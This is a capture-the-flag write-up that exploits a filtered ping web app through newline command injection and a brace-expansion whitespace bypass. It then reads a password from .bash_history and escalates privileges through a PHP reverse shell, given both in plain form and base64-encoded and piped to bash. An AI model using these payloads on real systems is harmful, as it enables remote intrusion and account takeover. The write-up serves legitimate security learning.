RCE can lead to privilege escalation

Shellemates club who has designed such a great infoSec challenges. Today we will be solving RCE to privilege escalation.

This challenge can be found here. http://web.challs.shellmates.club/

As per the challenge sayings. Our task is as above,

My friend made a simple web application that pings hosts on the internet to see if they’re up. When I asked him if he thought about the security part, he seemed so confident and started talking about his filter.
Go there and prove him that his web application is not that secure by leaking the content of /home/ctf/flag.txt.

From the task we know that we need to bypass the filter for the input ip in order to successfully inject OS commands that are executed with the privilege of the vulnerable application.

Information gathering

We know that if response has a TTL of 128, the target is probably running Windows. If the TTL is 64, the target is probably running some variant of Unix. By analyzing the response we can say that a Linux OS is there.

Step to reproduce RCE

When we supply `ip=127.0.0.1;ls` we get ‘Okay BOOMER’ as response let’s try to bypass this check in order to get our OS command executed

Yupi , just by LF injection since we know Linux is there we can see the index.php file, it’s good it’s over ‘We are hackers and hackers have black terminals with green font colors’ :) let’s try know to cat our /home/ctf/flag.txt by sending ‘ip=127.0.0.1\ncat /home/ctf/flag.txt’

Wait what Why is that ?!, Ok it won’t be executed since the whitespace character got encoded to + that might be blacklisted.

Humm now what are we doing :( we somehow need to bypass the whitespace character in order to execute any command.

So after trying a bit I found a way assuming a shell that supports `csh-like` brace expansion, for example {ls,-lah} this will list all files without using whitespaces.

Ok, we successfully bypass the whitespace character but we can not see anything inside the flag.txt, since we do not have the permission to read the file, On the other hand, one thing confused me why I can not see the bash error like ‘permission denied’.

let’s try too see the content of index.php as long as the read permission is set for others.

Ok, can clearly see this part ‘2> /dev/null’ which tells the bash to redirect errors to /dev/null , and this is why we did not get ‘Permission denied’ above.

Now let’s see what is inside the .bash_history of the ctf user

What is .bash_history file ?

File created by Bash, a Unix-based shell program commonly used on Mac OS X and Linux operating systems; stores a history of user commands entered at the command prompt; used for viewing old commands that have been executed.

Ok, in a real life scenario the .bash_history will only contain the old commands that the user have been executed in this case the .bash_history is modified i we can clearly see this Qu4r4Nt1n3d!@ assuming to be the password of ctf user.

Step to reproduce Privilege Escalation

No we only need to make horizontal-like privilege escalation from www-data user to ctf user in order to read the content of the flag.txt, this step can be done just by `su` to the ctf user since we have the password for this user.

However we can not inject this command in the way above since `su` command does not have -p like option in order to set the password for the ctf user so I need to get reverse shell.

As long as we know that php is works perfectly in this vulnerable application we can use a php payload our reverse shell.

php -r ‘$sock=fsockopen(“my-ip”,442);exec(“/bin/bash -i <&3 >&3 2>&3”);’

However we know that the application does not accept some characters like ; and so on, so the best way to to encode the payload with base64

my payload will look like :

127.0.0.1\n{echo,’cGhwIC1yICckc29jaz1mc29ja29wZW4oIm15LWlwIiw0NDIpO2V4ZWMoIi9iaW4vYmFzaCAtaSA8JjMgPiYzIDI+JjMiKTsnCg==’,|,base64,-d,|bash}

does not work OMG but why :( after a while i tried this on my local machine and got a wired errors like (,base64,-d,: command not found, Command ‘bash}’ not found, did you mean:) why is this ?!

after a bit a realized that linux braces {} only accepts commands with options and I can not use something like pipeline | or redirect > inside {} ,So I need to create to sets.

We somehow need a method to use | at the same time using our {}, For example the command ‘ls | grep a’ can be written ls|{grep,a} and its successfully executed however {ls,|,grep,a} does not work :).

Woah ! that’s nice let’s try to construct our payload again :

127.0.0.1\n{echo,’cGhwIC1yICckc29jaz1mc29ja29wZW4oIm15LWlwIiw0NDIpO2V4ZWMoIi9iaW4vYmFzaCAtaSA8JjMgPiYzIDI+JjMiKTsnCg==’}|{base64,-d}|bash

Yupi successfully got reverse shell, but wait can not su to ctf user why is that ?!

I need to upgrade my shell in order to execute `su` command using Spawn TTY with python

We have successfully completed the challenge :)

cybersec enthusiasts & full stack web dev #web #pwn #reverse #crypto